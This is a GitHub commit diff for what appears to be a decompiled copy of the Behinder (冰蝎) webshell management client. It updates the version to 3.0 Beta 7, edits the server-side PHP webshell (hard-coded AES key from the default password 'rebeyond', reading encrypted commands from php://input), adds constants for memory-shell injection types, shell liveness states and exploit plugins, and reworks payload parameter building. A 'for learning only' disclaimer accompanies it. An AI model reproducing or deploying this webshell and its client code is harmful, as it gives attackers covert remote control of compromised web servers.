MountCloud
diff --git a/‎README.md‎
Lines changed: 6 additions & 0 deletions b/‎README.md‎
Lines changed: 6 additions & 0 deletions
diff --git a/‎pom.xml‎
Lines changed: 4 additions & 0 deletions b/‎pom.xml‎
Lines changed: 4 additions & 0 deletions
diff --git a/‎server/shell.php‎
Lines changed: 1 addition & 0 deletions b/‎server/shell.php‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎src/main/java/net/rebeyond/behinder/core/Constants.java‎
Lines changed: 16 additions & 1 deletion b/‎src/main/java/net/rebeyond/behinder/core/Constants.java‎
Lines changed: 16 additions & 1 deletion
diff --git a/‎src/main/java/net/rebeyond/behinder/core/Params.java‎
Lines changed: 33 additions & 6 deletions b/‎src/main/java/net/rebeyond/behinder/core/Params.java‎
Lines changed: 33 additions & 6 deletions
diff --git a/‎src/main/java/net/rebeyond/behinder/core/PluginTools.java‎
Lines changed: 0 additions & 3 deletions b/‎src/main/java/net/rebeyond/behinder/core/PluginTools.java‎
Lines changed: 0 additions & 3 deletions
@@ -1,6 +1,11 @@
 # 冰蝎客户端源码
 首先致敬作者rebeyond：https://github.com/rebeyond/Behinder/releases
 
+# 更新内容
+```
+2021-04-11 逆向V3.0 Beta7 并且修复原版虚拟终端无法输入命令问题
+```
+
 # 郑重声明
 拿刀的不一定是屠夫，也有可能是伙夫，当然也有可能是大夫，本代码仅供学习，请保证必须一定勿用于非法用途！！！
 
@@ -11,6 +16,7 @@
 
 3.server目录下是服务端小马程序。
 
+
 # 分支
 本git的分支对标原版程序版本号。
 
 
@@ -136,6 +136,10 @@
           <include>**/*.gif</include>
           <include>**/*.asp</include>
           <include>**/*.php</include>
+          <include>**/*.jar</include>
+          <include>**/*.32</include>
+          <include>**/*.64</include>
+          <include>**/*.bak</include>
         </includes>
         <filtering>true</filtering>
       </resource>
 
@@ -3,6 +3,7 @@
 session_start();
     $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
 	$_SESSION['k']=$key;
+	session_write_close();
 	$post=file_get_contents("php://input");
 	if(!extension_loaded('openssl'))
 	{
 
@@ -2,7 +2,7 @@
 
 public class Constants {
    public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPod; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};
-   public static String VERSION = "v3.0 Beta 6 ";
+   public static String VERSION = "v3.0 Beta 7 ";
    public static int MENU_CUT = 1;
    public static int MENU_COPY = 16;
    public static int MENU_PASTE = 256;
@@ -27,5 +27,20 @@ public class Constants {
    public static int PLUGIN_TYPE_EXPLOIT = 1;
    public static int PLUGIN_TYPE_TOOL = 2;
    public static int PLUGIN_TYPE_OTHER = 3;
+   public static int OS_TYPE_WINDOWS = 0;
+   public static int OS_TYPE_LINUX = 1;
+   public static int OS_TYPE_UNIX = 2;
+   public static int OS_TYPE_MAC = 3;
+   public static int HISTORY_DIRECTION_UP = 0;
+   public static int HISTORY_DIRECTION_DOWN = 1;
+   public static int SHELL_STATUS_ALIVE = 0;
+   public static int SHELL_STATUS_DEAD = 1;
+   public static int LIST_STAGE_STARTED = 0;
+   public static int LIST_STAGE_DONE = 1;
+   public static int LIST_STAGE_FAIL = 2;
+   public static int MEMSHELL_TYPE_FILE = 0;
+   public static int MEMSHELL_TYPE_AGENT = 1;
+   public static int MEMSHELL_TYPE_FILTER = 2;
+   public static int MEMSHELL_TYPE_SERVLET = 3;
    public static String[] cookieProperty = new String[]{"expires", "max-age", "domain", "path", "secure", "httponly", "samesite"};
 }
@@ -3,8 +3,12 @@
 import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
 import java.io.ByteArrayInputStream;
 import java.io.ByteArrayOutputStream;
+import java.util.ArrayList;
 import java.util.Iterator;
+import java.util.List;
 import java.util.Map;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
 import net.rebeyond.behinder.utils.ReplacingInputStream;
 import net.rebeyond.behinder.utils.Utils;
 import org.objectweb.asm.ClassAdapter;
@@ -62,7 +66,7 @@ public static byte[] getParamedAssembly(String clsName, Map params) throws Excep
          String paramValue;
          for(Iterator var6 = params.keySet().iterator(); var6.hasNext(); paramsStr = paramsStr + paramName + ":" + paramValue + ",") {
             paramName = (String)var6.next();
-            paramValue = Base64.encode(((String)params.get(paramName)).toString().getBytes());
+            paramValue = Base64.encode(((String)params.get(paramName)).toString().getBytes("UTF-8"));
          }
 
          paramsStr = paramsStr.substring(0, paramsStr.length() - 1);
@@ -117,19 +121,42 @@ public static byte[] getParamedPhp(String clsName, Map params) throws Exception
       bis.close();
       code.append(bos.toString());
       String paraList = "";
+      Iterator var9 = getPhpParams(code.toString()).iterator();
 
-      String paraName;
-      for(Iterator var9 = params.keySet().iterator(); var9.hasNext(); paraList = paraList + ",$" + paraName) {
-         paraName = (String)var9.next();
-         String paraValue = (String)params.get(paraName);
-         code.append(String.format("$%s=\"%s\";", paraName, paraValue));
+      while(var9.hasNext()) {
+         String paraName = (String)var9.next();
+         if (params.keySet().contains(paraName)) {
+            String paraValue = (String)params.get(paraName);
+            code.append(String.format("$%s=\"%s\";", paraName, paraValue));
+            paraList = paraList + ",$" + paraName;
+         } else {
+            code.append(String.format("$%s=\"%s\";", paraName, ""));
+            paraList = paraList + ",$" + paraName;
+         }
       }
 
       paraList = paraList.replaceFirst(",", "");
       code.append("\r\nmain(" + paraList + ");");
       return code.toString().getBytes();
    }
 
+   public static List getPhpParams(String phpPayload) {
+      List paramList = new ArrayList();
+      Pattern mainPattern = Pattern.compile("main\\s*\\([^\\)]*\\)");
+      Matcher mainMatch = mainPattern.matcher(phpPayload);
+      if (mainMatch.find()) {
+         String mainStr = mainMatch.group(0);
+         Pattern paramPattern = Pattern.compile("\\$([a-zA-Z]*)");
+         Matcher paramMatch = paramPattern.matcher(mainStr);
+
+         while(paramMatch.find()) {
+            paramList.add(paramMatch.group(1));
+         }
+      }
+
+      return paramList;
+   }
+
    public static byte[] getParamedAsp(String clsName, Map params) throws Exception {
       String basePath = "net/rebeyond/behinder/payload/asp/";
       String payloadPath = basePath + clsName + ".asp";
 
@@ -53,7 +53,6 @@ public void sendTask(String pluginName, String paramStr) throws Exception {
                this.statusLabel.setText(msg);
             });
          } catch (Exception var7) {
-            var7.printStackTrace();
             Platform.runLater(() -> {
                this.statusLabel.setText("插件运行失败");
             });
@@ -80,7 +79,6 @@ public void sendTaskBackground(String pluginName, Map params, PluginSubmitCallBa
             String msg = resultObj.getString("msg");
             callBack.onPluginSubmit(status, msg);
          } catch (Exception var8) {
-            var8.printStackTrace();
             callBack.onPluginSubmit("fail", var8.getMessage());
          }
 
@@ -125,7 +123,6 @@ public void getTaskResult(String pluginName) {
 
             });
          } catch (Exception var8) {
-            var8.printStackTrace();
             Platform.runLater(() -> {
                this.statusLabel.setText("结果刷新失败:" + var8.getMessage());
             });
Original file line number	Diff line number	Diff line change
`@@ -3,6 +3,7 @@`
`3`	`3`	`session_start();`
`4`	`4`	`$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond`
`5`	`5`	`$_SESSION['k']=$key;`
	`6`	`+ session_write_close();`
`6`	`7`	`$post=file_get_contents("php://input");`
`7`	`8`	`if(!extension_loaded('openssl'))`
`8`	`9`	`{`